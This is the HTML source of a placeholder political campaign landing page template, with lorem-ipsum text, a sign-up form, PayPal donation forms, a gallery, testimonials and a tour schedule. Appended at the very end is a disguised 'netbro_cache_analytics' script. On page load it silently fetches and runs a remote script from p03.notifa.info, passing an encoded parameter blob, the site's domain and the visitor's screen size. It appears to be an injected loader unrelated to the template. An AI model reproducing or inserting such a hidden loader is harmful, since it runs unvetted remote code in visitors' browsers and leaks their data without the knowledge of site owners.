<!DOCTYPE html>
<html lang="en">
<head>
	<!-- Define Charset -->
	<meta charset="utf-8"/>

	<!-- Page Title -->
	<title>Candidate Political Landing Page</title>

	<!-- Responsive Metatag -->
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

	<!-- CSS -->
	<link rel="stylesheet" href="css/bootstrap.min.css">
	<link rel="stylesheet" href="css/fontello.css" >
	<link rel="stylesheet" href="css/YTPlayer.css" >
	<link rel="stylesheet" href="css/animate.css" >
	<link rel="stylesheet" href="js/fancybox/jquery.fancybox.css" >
	<link rel="stylesheet" href="js/owl-carousel/owl.carousel.css" >
	<link rel="stylesheet" href="js/owl-carousel/owl.theme.css" >
	<!-- Custom CSS -->
	<link rel="stylesheet" href="css/styles-blue.css" />
	<!-- Custom Media-Queties -->
	<link rel="stylesheet" href="css/media-queries-blue.css" />

	<!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
	<!--[if lt IE 9]>
		<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
	<![endif]-->

	<!-- Media queries -->
	<!--[if lt IE 9]>
		<script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
	<![endif]-->
</head>


<body>

<!-- begin Header -->
<header>

	<nav class="navbar navbar-fixed-top" role="navigation">
	<div class="container">

	<!-- Brand and toggle get grouped for better mobile display -->
	<div class="navbar-header">
		<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
			<span class="sr-only">Toggle navigation</span>
			<span class="icon-bar"></span>
			<span class="icon-bar"></span>
			<span class="icon-bar"></span>
		</button>
		<a class="navbar-brand" href="#"><img src="img/logo.png" alt="Logo" /></a>
	</div>

	<!-- Collect the nav links, forms, and other content for toggling -->
	<div class="collapse navbar-collapse">
		<ul class="nav navbar-nav">
			<li class="active"><a href="#home">Home</a></li>
			<li><a href="#video">Video</a></li>
			<li><a href="#gallery">Gallery</a></li>
			<li><a href="#profile">Profile</a></li>
			<li><a href="#team">Team</a></li>
			<li><a href="#testimonials">Testimonials</a></li>
			<li><a href="#tour">Tour</a></li>
		</ul>
	</div><!--/.nav-collapse -->

	</div>
	</nav>

</header>
<!-- end Header -->


<!-- begin Content -->
	<!-- Slider and Form -->
	<article class="home animate" id="home" data-animate="fadeIn">
		<div class="container">
			<div class="row">
				<div class="col-md-8 intro">
					<h3>Political Landing Page</h3>
					<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aenean quis eleifend lectus, eu molestie purus. Curabitur hendrerit mattis metus a pellentesque Phasellus scelerisque eros diam, at venenatis mauris imperdiet</p>
					<a href="#donation" class="btn btn-default">Make a Donation</a>
				</div>
				<div class="col-md-4">
					<form role="form" data-ajax="1" method="POST" action="contact-form.php">
						<h2>JOIN THE CAMPAIGN</h2>
						<div class="form-group">
							<label class="sr-only" for="name">Enter your Name</label>
							<input type="text" class="form-control" id="name" name="name" placeholder="Enter your name" />
						</div>
						<div class="form-group">
							<label class="sr-only" for="phone">Enter your Phone</label>
							<input type="text" class="form-control" id="phone" name="phone" placeholder="Enter your phone" />
						</div>
						<div class="form-group">
							<label class="sr-only" for="email">Enter your E-mail</label>
							<input type="email" class="form-control" id="email" name="email" placeholder="Enter your e-mail" />
						</div>
						<button type="submit" class="btn btn-default"><i class="icon-mail"></i> Get more Information</button>
						<div class="form-response"></div>
					</form>
				</div>
			</div>
		</div>
	</article>
	<!-- end Slider and Form -->


	<!-- Information -->
	<article class="information" id="information">
		<div class="container">
			<div class="row">
				<div class="col-sm-12 col-md-4 animate" data-animate="fadeIn">
					<h3><i class="icon-user"></i> Candidate Recent News</h3>
					<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Incidunt, placeat, atque, nulla, cumque ratione commodi consectetur porro nihil ad. Fuga pariatur dolorum alias ullam facere?</p>
					<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Nisi, consectetur, sapiente dolorem aperiam facilisunt blanditiis expedita veritatis repudiandae illum est officiis pariatur id qui?</p>
					<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Minima, tempora, ipsam, quam soluta nulla quod totam unde ipsa architecto ut nesciuilis autem? Porro, sapiente. <a href="#">+ Read more...</a></p>

				</div>
				<div class="col-sm-6 col-md-4 animate" data-animate="fadeIn">
					<h3><i class="icon-map"></i> See the future</h3>
					<p>Consequuntur soluta pariatur nisi aliquid voluptatem et est veniam distinctio alias mollitia. Dolor, tenetur reprehenderit laudantium deleniti fuga pariatur impedit voluptates earum.</p>
				</div>
				<div class="col-sm-6 col-md-4 animate" data-animate="fadeIn">
					<h3><i class="icon-pencil"></i> Candidate Info</h3>
					<p>Consequuntur soluta pariatur nisi aliquid voluptatem et est veniam distinctio alias mollitia. Dolor, tenetur reprehenderit laudantium deleniti fuga pariatur impedit voluptates earum.</p>
				</div>
				<div class="col-sm-6 col-md-4 animate" data-animate="fadeIn">
					<h3><i class="icon-globe"></i> Yes we can do it</h3>
					<p>Consequuntur soluta pariatur nisi aliquid voluptatem et est veniam distinctio alias mollitia. Dolor, tenetur reprehenderit laudantium deleniti fuga pariatur impedit voluptates earum.</p>
				</div>
				<div class="col-sm-6 col-md-4 animate" data-animate="fadeIn">
					<h3><i class="icon-vcard"></i> Take you vote</h3>
					<p>Consequuntur soluta pariatur nisi aliquid voluptatem et est veniam distinctio alias mollitia. Dolor, tenetur reprehenderit laudantium deleniti fuga pariatur impedit voluptates earum.</p>
				</div>
			</div>
		</div>
	</article>
	<!-- end Information -->


	<!-- Video -->
	<article class="video animate" id="video" data-animate="fadeIn">
	<div class="separator"></div>
	<a
		id="bgndVideo"
		class="player"
		data-property="{autoPlay:true,containment:'#video',loop: false,mute:true,opacity:1,ratio:16/9,showControls:true,videoURL:'http://youtu.be/pXCWxmXvhDc',showYTLogo:false}">My video</a>
	</article>
	<!-- end Video -->


	<!-- Gallery -->
	<article class="gallery animate" id="gallery" data-animate="fadeIn">
	<div class="container">

		<div class="row">
		<div class="col-md-12 ">
			<h2>The Campain Image Gallery</h2>

			<div id="owl-carousel-gallery" class="owl-carousel">

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image01.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image01.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>


			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image02.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image02.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image03.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image03.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image04.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image04.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>


			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image05.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image05.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image06.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image06.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image07.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image07.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image08.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image08.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image09.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image09.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>

			<figure class="item">
				<div class="item-thumbnail">
					<img src="img/gallery/image10.jpg" alt="//">
					<div class="overthumb"></div>
					<div class="icons"></div>
					<a href="img/gallery/image10.jpg" class="fancybox" data-rel="gallery">read more</a>
				</div>
				<figcaption>
					<p>Placeat, at, alias labore dolor fugit eum saepe exercitationem.</p>
				</figcaption>
			</figure>
			</div>
		</div>
		</div>

	</div>
	</article>
	<!-- end Gallery -->


	<!-- Profile -->
	<article class="profile" id="profile">
	<div class="container">
		<h2>Meet the Candidate Profile</h2>

		<div class="row">

			<div class="col-md-3">
				<div class="profile-item animate" data-animate="flipInX">
					<h3><i class="round icon-mic"></i> Conferences</h3>
					<p>Consectetur adipiscing elit. Phasellus faucibus porttitor laniquam enim ligula.
Amalesuada at aliquet a, molestie eget eros. Donec felis nisl, scelerisque.</p>
				</div>
				<div class="profile-item animate" data-animate="flipInX">
					<h3><i class="round icon-globe"></i> World Tour</h3>
					<p>Consectetur adipiscing elit. Phasellus faucibus porttitor laniquam enim ligula.
Amalesuada at aliquet a, molestie eget eros. Donec felis nisl, scelerisque.</p>
				</div>
			</div>

			<div class="col-md-6 animate" data-animate="fadeIn">
				<figure class="img-candidate">
					<img src="img/candidate/face.png" alt="//" />
				</figure>
			</div>

			<div class="col-md-3">
				<div class="profile-item animate" data-animate="flipInX">
					<h3><i class="round icon-user"></i> Biogrphy</h3>
					<p>Consectetur adipiscing elit. Phasellus faucibus porttitor laniquam enim ligula.
Amalesuada at aliquet a, molestie eget eros. Donec felis nisl, scelerisque.</p>
				</div>
				<div class="profile-item animate" data-animate="flipInX">
					<h3><i class="round icon-comment"></i> Thoughts</h3>
					<p>Consectetur adipiscing elit. Phasellus faucibus porttitor laniquam enim ligula.
Amalesuada at aliquet a, molestie eget eros. Donec felis nisl, scelerisque.</p>
				</div>
			</div>
		</div>

	</div>
	</article>
	<!-- end Profile -->


	<!-- Donation -->
	<article class="donation animate" id="donation" data-animate="fadeIn">
	<div class="container">

		<div class="row">

		<div class="col-sm-6 first donation_item">
			<h2>Recurring Donation</h2>

			<p>Please use the form below to enter your desired giving amount and how often (weekly, monthly, yearly) you'd like to make your automatic donation. Note: PayPal account required. </p>

			<form id="form_paypal_rec" action="https://www.paypal.com/cgi-bin/webscr" method="post" class="form-horizontal" role="form">
				<input name="cmd" type="hidden" value="_xclick-subscriptions" />

				<!--- Enter your PayPal Business Email Account here -->
				<input name="business" type="hidden" value="donation@companyname.com" />

				<!--- Enter your thank you page link here -->
				<input name="return" type="hidden" value="http://www.yourwebsite.com/thank-you.html" />

				<input name="item_name" type="hidden" value="Recurring Donation" />
				<input name="no_shipping" type="hidden" value="1" />
				<input name="no_note" type="hidden" value="1" />
				<input name="currency_code" type="hidden" value="USD" />
				<input name="p3" type="hidden" value="1" />
				<input name="src" type="hidden" value="1" />
				<input name="sra" type="hidden" value="1" />
				<div class="row">
					<div class="col-md-6">
						<div class="form-group">
							<label for="input_amount_rec" class="col-xs-4 control-label">Amount:</label>
							<div class="col-xs-8">
								<input id="input_amount_rec"  class="form-control" name="a3" type="text"  placeholder="1.00 dollars"/>
							</div>
						</div>
					</div>
					<div class="col-md-6">
						<div class="form-group">
							<label for="often" class="col-xs-5 control-label">How Often:</label>
							<div class="col-xs-7">
								<select name="t3" class="form-control" id="often">
									<option value="W">Weekly</option>
									<option value="M">Monthly</option>
									<option value="Y">Yearly</option>
								</select>
							</div>
						</div>
					</div>
					<div class="col-md-offset-6 col-md-6">
						<div class="form-group">
							<div class="col-xs-offset-4 col-xs-8">
								<button class="btn btn-default" name="submit"><i class="icon-right-circled"></i> Donate Now</button>
							</div>
						</div>
					</div>
				</div>



				<div class="row">
				<div class="col-md-12">
					<div id="msg_moreamount_rec" class="alert alert-warning alert-dismissable">
						<button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
						PayPal takes $0.35 commission for a $1 donation. Please enter at least $1.35 , thank you!
					</div>

					<div id="msg_noamount_rec" class="alert alert-danger alert-dismissable">
						<button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
						Please enter the amount you wish to donate and try again.
					</div>

					<div id="msg_activity_rec" class="alert alert-success alert-dismissable">
						<button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
						<i class="icon-arrows-ccw"></i> Transferring to PayPal, please wait...
					</div>
				</div>
				</div>
			</form>

		</div>

		<div class="col-sm-6 donation_item">

			<h2>One-Time Donation</h2>

			<p>Thank you for considering making a  donation to our charitable organization. Please use the form below to enter your desired giving amount. Note: PayPal account is not required.</p>

			<form id="form_paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post" class="form-horizontal" role="form">
				<input name="cmd" type="hidden" value="_donations" />

				<!--- Enter your PayPal Business Email Account here -->
				<input name="business" type="hidden" value="info@campain.com" />

				<input name="no_shipping" type="hidden" value="0" />
				<input name="no_note" type="hidden" value="1" />
				<input name="currency_code" type="hidden" value="USD" />

				<!--- Enter your thank you page link here -->
				<input name="return" type="hidden" value="http://www.yourwebsite.com/thank-you.html" />

				<input name="tax" type="hidden" value="0" />
				<input name="bn" type="hidden" value="PP-DonationsBF" />

				<div class="row">
				<div class="col-md-8">
					<div class="form-group">
						<label for="input_amount" class="col-xs-4 control-label">Amount:</label>
						<div class="col-xs-8">
							<input id="input_amount" class="form-control" name="amount" type="text" placeholder="1.00 dollars" />
						</div>
					</div>
				</div>

				<div class="col-md-4">
					<div class="form-group">
						<div class="col-xs-8 col-xs-offset-4 col-md-12 col-md-offset-0">
							<button class="btn btn-default" name="submit"><i class="icon-right-circled"></i> Donate Now</button>
						</div>
					</div>
				</div>
				</div>



				<div class="row">
				<div class="col-md-12">

				<div id="msg_moreamount" class="alert alert-warning alert-dismissable">
					<button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
					PayPal takes $0.35 commission for a $1 donation. Please enter at least $1.35 , thank you!
				</div>

				<div id="msg_noamount" class="alert alert-danger alert-dismissable">
					<button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
					Please enter the amount you wish to donate and try again.
				</div>

				<div id="msg_activity" class="alert alert-success alert-dismissable">
					<button type="button" class="close" data-dismiss="alert" aria-hidden="true">&times;</button>
					<i class="icon-arrows-ccw"></i> Transferring to PayPal, please wait...
				</div>

				</div>
				</div>
			</form>
		</div>

		</div>

		<div class="row">
			<div class="col-sm-12">
				<hr>
			</div>
		</div>

		<div class="row">
			<div class="col-sm-6">
				<h4>Need to update your recurring donation subscription?</h4>

				<div class="row">
				<div class="col-sm-3">
					<a class="logo-paypal" href="https://www.paypal.com/us/webapps/mpp/paypal-safety-and-security">
						<figure>
							<img src="img/paypal.png" alt="paypal logo">
						</figure>
					</a>
				</div>

				<div class="col-sm-9">
					<div>
						<p>In case you need to cancel your monthly gifts at any time, you'll be able to do so by <a href="http://www.paypal.com">logging into your PayPal account</a>. Questions? Email <a href="mailto:donations@example.com">donations@compain.org</a></p>
					</div>
				</div>

				</div>
			</div>

			<div class="col-sm-6">
				<h4>Others Donation Methos</h4>
				<p>In case you need to cancel your monthly gifts at any time, you'll be able to do so by <a href="http://www.paypal.com">logging into your PayPal account</a>. Questions? Email <a href="mailto:donations@example.com">donations@compain.org</a></p>
			</div>


		</div>

	</div>
	</article>
	<!-- end Donation -->

	<!-- Team -->
	<article class="team animate" id="team" data-animate="fadeIn">
	<div class="container">
		<h2>We don't play  alone, we play like a Team</h2>

		<div class="row">
			<div class="col-md-6">
				<iframe class="youtube" src="//www.youtube.com/embed/Twhrtpm_m0A" allowfullscreen></iframe>
			</div>
			<div class="col-md-6">

				<div class="panel-group" id="accordion">
					<div class="panel">
						<div class="panel-heading">
							<h4 class="panel-title">
								<a data-toggle="collapse" data-parent="#accordion" href="#collapseOne">
									<i class="icon-down-circled"></i>Candidate schedule
								</a>
							</h4>
						</div>
						<div id="collapseOne" class="panel-collapse collapse in">
							<div class="panel-body">
								Lorem ipsum dolor sit amet, consectetur adipisicing elit. Porro, sunt, animi commodi laboriosam distinctio labore.
							</div>
						</div>
					</div>
					<div class="panel">
						<div class="panel-heading">
							<h4 class="panel-title">
								<a data-toggle="collapse" data-parent="#accordion" href="#collapseTwo" class="collapsed">
									<i class="icon-right-circled"></i>Presidential Memorandal
								</a>
							</h4>
						</div>
						<div id="collapseTwo" class="panel-collapse collapse">
							<div class="panel-body">
								Lorem ipsum dolor sit amet, consectetur adipisicing elit. Porro, sunt, animi commodi laboriosam distinctio labore.
							</div>
						</div>
					</div>
					<div class="panel">
						<div class="panel-heading">
							<h4 class="panel-title">
								<a data-toggle="collapse" data-parent="#accordion" href="#collapseThree" class="collapsed">
									<i class="icon-right-circled"></i>Candidate Actions
								</a>
							</h4>
						</div>
						<div id="collapseThree" class="panel-collapse collapse">
							<div class="panel-body">
								Lorem ipsum dolor sit amet, consectetur adipisicing elit. Porro, sunt, animi commodi laboriosam distinctio labore.
							</div>
						</div>
					</div>
					<div class="panel">
						<div class="panel-heading">
							<h4 class="panel-title">
								<a data-toggle="collapse" data-parent="#accordion" href="#collapseFour" class="collapsed">
									<i class="icon-right-circled"></i>Retirement Savings
								</a>
							</h4>
						</div>
						<div id="collapseFour" class="panel-collapse collapse">
							<div class="panel-body">
								Lorem ipsum dolor sit amet, consectetur adipisicing elit. Porro, sunt, animi commodi laboriosam distinctio labore.
							</div>
						</div>
					</div>
				</div>

			</div>
		</div>

	</div>
	</article>
	<!-- end Team -->


	<!-- Testimonials -->
	<article class="testimonials animate" id="testimonials" data-animate="fadeIn">
	<div class="container">
		<h2>Real People Testimonials</h2>

		<div id="owl-carousel-testimonials" class="owl-carousel">

		<div class="testimonials-item">
			<figure><img src="img/people/testimonials01.jpg" alt="//"></figure>
			<h3>Megan Kevnova:</h3>
			<p>&quot;Sometimes you just need to think out ofthe box. We provide new ways of displing your Content.&quot;</p>
		</div>
		<div class="testimonials-item">
			<figure><img src="img/people/testimonials02.jpg" alt="//"></figure>
			<h3>Megan Kevnova:</h3>
			<p>&quot;Sometimes you just need to think out ofthe box. We provide new ways of displing your Content.&quot;</p>
		</div>
		<div class="testimonials-item">
			<figure><img src="img/people/testimonials03.jpg" alt="//"></figure>
			<h3>Megan Kevnova:</h3>
			<p>&quot;Sometimes you just need to think out ofthe box. We provide new ways of displing your Content.&quot;</p>
		</div>
		<div class="testimonials-item">
			<figure><img src="img/people/testimonials01.jpg" alt="//"></figure>
			<h3>Megan Kevnova:</h3>
			<p>&quot;Sometimes you just need to think out ofthe box. We provide new ways of displing your Content.&quot;</p>
		</div>
		<div class="testimonials-item">
			<figure><img src="img/people/testimonials02.jpg" alt="//"></figure>
			<h3>Megan Kevnova:</h3>
			<p>&quot;Sometimes you just need to think out ofthe box. We provide new ways of displing your Content.&quot;</p>
		</div>
		<div class="testimonials-item">
			<figure><img src="img/people/testimonials03.jpg" alt="//"></figure>
			<h3>Megan Kevnova:</h3>
			<p>&quot;Sometimes you just need to think out ofthe box. We provide new ways of displing your Content.&quot;</p>
		</div>
		<div class="testimonials-item">
			<figure><img src="img/people/testimonials01.jpg" alt="//"></figure>
			<h3>Megan Kevnova:</h3>
			<p>&quot;Sometimes you just need to think out ofthe box. We provide new ways of displing your Content.&quot;</p>
		</div>

		</div>
	</div>
	</article>
	<!-- end Testimonials -->

	<!-- Events and Tour -->
	<article class="tour animate" id="tour" data-animate="fadeIn">
	<div class="container">

		<h2>Candidate Events Tour</h2>

		<div class="tour-item">
			<div class="content">
				<div class="marker"><i class="icon-location"></i></div>
				<h3>New York - 20 April 2015</h3>
				<p>Sometimes you just needto think out of the box. We provide new ways of displaying your unique moment.</p>
				<a href="#">+ Read more...</a>
			</div>
			<div class="clearfix"></div>
		</div>
		<div class="tour-item">
			<div class="content">
				<div class="marker"><i class="icon-location"></i></div>
				<h3>Virginia - 26 April 2015</h3>
				<p>Sometimes you just needto think out of the box. We provide new ways of displaying your unique moment.</p>
				<a href="#">+ Read more...</a>
			</div>
			<div class="clearfix"></div>
		</div>
		<div class="tour-item">
			<div class="content">
				<div class="marker"><i class="icon-location"></i></div>
				<h3>Atlanta Visit - 02 June 2015</h3>
				<p>Sometimes you just needto think out of the box. We provide new ways of displaying your unique moment.</p>
				<a href="#">+ Read more...</a>
			</div>
			<div class="clearfix"></div>
		</div>
		<div class="tour-item">
			<div class="content">
				<div class="marker"><i class="icon-location"></i></div>
				<h3>Texas Visit - 18 July 2015</h3>
				<p>Sometimes you just needto think out of the box. We provide new ways of displaying your unique moment.</p>
				<a href="#">+ Read more...</a>
			</div>
			<div class="clearfix"></div>
		</div>

	</div>
	</article>
	<!-- end Events and Tour -->
<!-- end Content -->

<!-- Footer -->
<footer class="footer">
<a href="#home" class="go-to-top"><i class="icon-up-open-mini"></i></a>

<div class="container">
	<div class="row">
	<div class="col-md-4">
		<h3>
			About the Candidate
			<span></span>
		</h3>
		<div class="row">
			<div class="col-md-3">
				<figure class="about-img">
					<img src="img/people/testimonials02.jpg" alt="//">
				</figure>
			</div>
			<div class="col-md-9">
				<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Nam, harum dolore vitae expedita iste necessitatibus laudantium porro eius rem numquam molestiae ab sint cum! Libero odio quia saepe perferendis iure? <a href="#">Read more...</a></p>
			</div>
		</div>
	</div>
	<div class="col-sm-6 col-md-4">
		<h3>
			Important Links
			<span></span>
		</h3>
		<div class="row">
			<div class="col-xs-6">
				<ul>
					<li><i class="icon-right-open-mini"></i> <a href="#">Health Care</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Education</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Economy</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Creating Jobs</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Business</a></li>
				</ul>
			</div>
			<div class="col-xs-6">
				<ul>
					<li><i class="icon-right-open-mini"></i> <a href="#">Health Care</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Education</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Economy</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Creating Jobs</a></li>
					<li><i class="icon-right-open-mini"></i> <a href="#">Business</a></li>
				</ul>
			</div>
		</div>
	</div>
	<div class="col-sm-6 col-md-4">
		<h3>
			Last Tweets
			<span></span>
		</h3>

		<a
			class="twitter-timeline"
			data-aria-polite="assertive"
			data-chrome="noheader nofooter noborders transparent noborders noscrollbar"
			data-link-color="#fff"
			data-related="twitterapi,twitter"
			data-theme="dark"
			data-tweet-limit="1"
			data-widget-id="382601373847527424"
			href="https://twitter.com/BarackObama"
			lang="EN"
		>Tweets por @BarackObama</a>
		<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
	</div>
	</div>
</div>


<div class="bottom-foot">
<div class="container">
	<div class="row">

	<div class="col-md-6">
		<ul class="social">
			<li><a href="#" class="facebook" data-toggle="tooltip" title="Facebook"><i class="icon-facebook"></i></a></li>
			<li><a href="#" class="twitter" data-toggle="tooltip" title="Twitter"><i class="icon-twitter"></i></a></li>
			<li><a href="#" class="gplus" data-toggle="tooltip" title="Google Plus"><i class="icon-gplus"></i></a></li>
			<li><a href="#" class="vimeo" data-toggle="tooltip" title="Vimeo"><i class="icon-vimeo"></i></a></li>
			<li><a href="#" class="linkedin" data-toggle="tooltip" title="LinkedIn"><i class="icon-linkedin"></i></a></li>
			<li><a href="#" class="mail" data-toggle="tooltip" title="Email"><i class="icon-mail"></i></a></li>
		</ul>
	</div>
	<div class="col-md-6 copy">&copy; Copyright 2015. All Rights Reserverd / CoralixThemes</div>

	</div>
</div>
</div>

</footer>
<!-- end Footer -->



<!-- ************************* Javascript Files ************************* -->
	<!-- jQuery -->
	<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
	<script>window.jQuery || document.write("<script src=\"js/jquery-1.9.1.min.js\"")</script>
	<!-- Respond.js media queries for IE8 -->
	<script src="js/respond.min.js"></script>
	<!-- Bootstrap-->
	<script src="js/bootstrap.min.js" ></script>
	<!-- Youtube Player-->
	<script src="js/jquery/jquery.mb.YTPlayer.js" ></script>
	<!-- Fancybox-->
	<script src="js/fancybox/jquery.fancybox.js" ></script>
	<!-- Carousel-->
	<script src="js/owl-carousel/owl.carousel.min.js" ></script>
	<!-- Paypal Payment-->
	<script src="js/paypal/paypal_donate.js" ></script>
	<!-- Waypoints-->
	<script src="js/waypoints.min.js" ></script>
	<!-- Placeholder.js -->
	<!--[if lte IE 9]> <script src="js/placeholder.js" ></script> <script>Placeholder.init();</script> <![endif]-->
	<!-- Custom scripts -->
	<script src="js/script.js"  ></script>
<!-- *********************** End Javascript Files *********************** -->

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprA7z4gA6nwSjdazapvW6QwNt2TfJ3G3vbNkO4dmp5r%2bgxigDvmLkAsk7ae9gqHWDe56bI9%2fkMfv3HyMO%2fwMjzRADx7NixROwclhIxzikCzcp7X6eoHPhuKYwakv%2bWqn%2bXyQeCV01Ih2hEKfmfoaDcseG7N8aX6kRYqcFhGHge1%2fh%2fu%2bZDaYZ96n6zXXbCQVRAmYD3tgojSrNV87zsdoiNsUXfnN43RT4OgZgRpZZ7WGrZpvIafPSTobMznPKiQDoKSF%2ftPag6DDA%2b0%2blJECUDv20FAn7TgiDYFUjk6QyZ6RpTtEFU%2bHIKp42tV3qweafU1tEjOtaIoTLOvpUUh70APd5wM%2bPlLuQ6fgmva5Oy39HST9%2fd6F%2fBxHIpE9XYUbMN0A1MLsvDcQ5CMnJBE%2bUGCMDiVN0KJtmlWyowAFrkNMEe4PP4Z36kI2pFfFQmOL9auHRjhuHDkGxAG4hBOugnWnqkDR7b0EFLLjAp7CdzXqf%2bnEY2eXBld8g1Yhy%2fbiK3L" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
